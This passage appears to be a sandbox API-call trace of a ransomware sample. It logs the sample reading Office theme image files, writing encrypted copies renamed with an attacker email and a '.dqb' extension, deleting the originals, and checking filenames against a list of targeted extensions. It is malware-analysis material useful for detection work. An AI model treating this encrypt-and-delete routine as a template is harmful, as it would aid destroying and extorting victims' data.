Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0044.143] GetLastError () returned 0x0 [0044.143] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x9ac, lpOverlapped=0x0) returned 1 [0044.145] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x9b0, lpOverlapped=0x0) returned 1 [0044.146] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.146] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.146] SetEndOfFile (hFile=0x204) returned 1 [0044.146] CloseHandle (hObject=0x204) returned 1 [0044.146] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.146] SetEndOfFile (hFile=0x174) returned 1 [0044.147] CloseHandle (hObject=0x174) returned 1 [0044.147] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.147] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif")) returned 1 [0044.147] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0044.147] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0044.147] lstrlenW (lpString=".doc") returned 4 [0044.147] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.147] lstrlenW (lpString=".docx") returned 5 [0044.147] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.147] lstrlenW (lpString=".pdf") returned 4 [0044.147] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.147] lstrlenW (lpString=".xls") returned 4 [0044.147] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.148] lstrlenW (lpString=".xlsx") returned 5 [0044.148] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.148] lstrlenW (lpString=".ppt") returned 4 [0044.148] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.148] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0044.148] lstrlenW (lpString=".zip") returned 4 [0044.148] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.148] lstrlenW (lpString=".rar") returned 4 [0044.148] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.148] lstrlenW (lpString=".bz2") returned 4 [0044.148] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.148] lstrlenW (lpString=".7z") returned 3 [0044.148] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.148] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0044.148] lstrlenW (lpString=".dbf") returned 4 [0044.148] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.148] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0044.148] lstrlenW (lpString=".1cd") returned 4 [0044.148] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.148] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0044.148] lstrlenW (lpString=".jpg") returned 4 [0044.148] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.148] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0044.148] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0044.148] lstrlenW (lpString=".doc") returned 4 [0044.148] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.148] lstrlenW (lpString=".docx") returned 5 [0044.148] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.148] lstrlenW (lpString=".pdf") returned 4 [0044.148] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.148] lstrlenW (lpString=".xls") returned 4 [0044.148] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.148] lstrlenW (lpString=".xlsx") returned 5 [0044.148] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.148] lstrlenW (lpString=".ppt") returned 4 [0044.149] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.149] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0044.149] lstrlenW (lpString=".zip") returned 4 [0044.149] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.149] lstrlenW (lpString=".rar") returned 4 [0044.149] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.149] lstrlenW (lpString=".bz2") returned 4 [0044.149] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.149] lstrlenW (lpString=".7z") returned 3 [0044.149] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.149] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0044.149] lstrlenW (lpString=".dbf") returned 4 [0044.149] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.149] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0044.149] lstrlenW (lpString=".1cd") returned 4 [0044.149] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.149] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0044.149] lstrlenW (lpString=".jpg") returned 4 [0044.149] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.149] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0044.149] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.149] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.149] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=19485) returned 1 [0044.150] CloseHandle (hObject=0x174) returned 1 [0044.150] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png")) returned 0x20 [0044.150] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.150] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.150] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.150] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.150] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0044.150] GetLastError () returned 0x0 [0044.150] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x4c1d, lpOverlapped=0x0) returned 1 [0044.309] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x4c20, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x4c20, lpOverlapped=0x0) returned 1 [0044.310] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.310] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.311] SetEndOfFile (hFile=0x204) returned 1 [0044.311] CloseHandle (hObject=0x204) returned 1 [0044.311] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.311] SetEndOfFile (hFile=0x174) returned 1 [0044.312] CloseHandle (hObject=0x174) returned 1 [0044.312] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.312] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png")) returned 1 [0044.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0044.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0044.312] lstrlenW (lpString=".doc") returned 4 [0044.312] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.312] lstrlenW (lpString=".docx") returned 5 [0044.312] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.312] lstrlenW (lpString=".pdf") returned 4 [0044.312] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.312] lstrlenW (lpString=".xls") returned 4 [0044.312] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.312] lstrlenW (lpString=".xlsx") returned 5 [0044.313] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.313] lstrlenW (lpString=".ppt") returned 4 [0044.313] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0044.313] lstrlenW (lpString=".zip") returned 4 [0044.313] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.313] lstrlenW (lpString=".rar") returned 4 [0044.313] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.313] lstrlenW (lpString=".bz2") returned 4 [0044.313] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.313] lstrlenW (lpString=".7z") returned 3 [0044.313] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0044.313] lstrlenW (lpString=".dbf") returned 4 [0044.313] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0044.313] lstrlenW (lpString=".1cd") returned 4 [0044.313] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0044.313] lstrlenW (lpString=".jpg") returned 4 [0044.313] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0044.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0044.313] lstrlenW (lpString=".doc") returned 4 [0044.313] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.313] lstrlenW (lpString=".docx") returned 5 [0044.313] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.313] lstrlenW (lpString=".pdf") returned 4 [0044.313] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.313] lstrlenW (lpString=".xls") returned 4 [0044.313] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.313] lstrlenW (lpString=".xlsx") returned 5 [0044.313] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.313] lstrlenW (lpString=".ppt") returned 4 [0044.313] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0044.314] lstrlenW (lpString=".zip") returned 4 [0044.314] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.314] lstrlenW (lpString=".rar") returned 4 [0044.314] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.314] lstrlenW (lpString=".bz2") returned 4 [0044.314] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.314] lstrlenW (lpString=".7z") returned 3 [0044.314] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0044.314] lstrlenW (lpString=".dbf") returned 4 [0044.314] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0044.314] lstrlenW (lpString=".1cd") returned 4 [0044.314] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0044.314] lstrlenW (lpString=".jpg") returned 4 [0044.314] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.314] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0044.314] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.314] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0044.335] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=1379) returned 1 [0044.335] CloseHandle (hObject=0x160) returned 1 [0044.335] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif")) returned 0x20 [0044.335] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.335] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0044.335] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.336] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.336] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0044.337] GetLastError () returned 0x0 [0044.337] ReadFile (in: hFile=0x160, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x563, lpOverlapped=0x0) returned 1 [0044.338] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x570, lpOverlapped=0x0) returned 1 [0044.339] ReadFile (in: hFile=0x160, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.339] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.339] SetEndOfFile (hFile=0x204) returned 1 [0044.340] CloseHandle (hObject=0x204) returned 1 [0044.340] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.340] SetEndOfFile (hFile=0x160) returned 1 [0044.340] CloseHandle (hObject=0x160) returned 1 [0044.340] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.341] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif")) returned 1 [0044.341] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0044.341] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0044.341] lstrlenW (lpString=".doc") returned 4 [0044.341] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.341] lstrlenW (lpString=".docx") returned 5 [0044.341] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.341] lstrlenW (lpString=".pdf") returned 4 [0044.341] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.341] lstrlenW (lpString=".xls") returned 4 [0044.341] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.341] lstrlenW (lpString=".xlsx") returned 5 [0044.341] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.341] lstrlenW (lpString=".ppt") returned 4 [0044.341] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.341] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0044.341] lstrlenW (lpString=".zip") returned 4 [0044.341] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.341] lstrlenW (lpString=".rar") returned 4 [0044.341] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.341] lstrlenW (lpString=".bz2") returned 4 [0044.341] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.341] lstrlenW (lpString=".7z") returned 3 [0044.341] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.341] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0044.341] lstrlenW (lpString=".dbf") returned 4 [0044.342] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0044.342] lstrlenW (lpString=".1cd") returned 4 [0044.342] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0044.342] lstrlenW (lpString=".jpg") returned 4 [0044.342] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0044.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0044.342] lstrlenW (lpString=".doc") returned 4 [0044.342] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.342] lstrlenW (lpString=".docx") returned 5 [0044.342] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.342] lstrlenW (lpString=".pdf") returned 4 [0044.342] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.342] lstrlenW (lpString=".xls") returned 4 [0044.342] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.342] lstrlenW (lpString=".xlsx") returned 5 [0044.342] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.342] lstrlenW (lpString=".ppt") returned 4 [0044.342] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0044.342] lstrlenW (lpString=".zip") returned 4 [0044.342] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.342] lstrlenW (lpString=".rar") returned 4 [0044.342] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.342] lstrlenW (lpString=".bz2") returned 4 [0044.342] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.342] lstrlenW (lpString=".7z") returned 3 [0044.342] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0044.342] lstrlenW (lpString=".dbf") returned 4 [0044.342] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0044.342] lstrlenW (lpString=".1cd") returned 4 [0044.342] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0044.343] lstrlenW (lpString=".jpg") returned 4 [0044.343] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.343] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0044.343] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.343] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0044.343] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=48115) returned 1 [0044.343] CloseHandle (hObject=0x160) returned 1 [0044.343] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png")) returned 0x20 [0044.343] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.343] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0044.343] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.344] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.344] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" 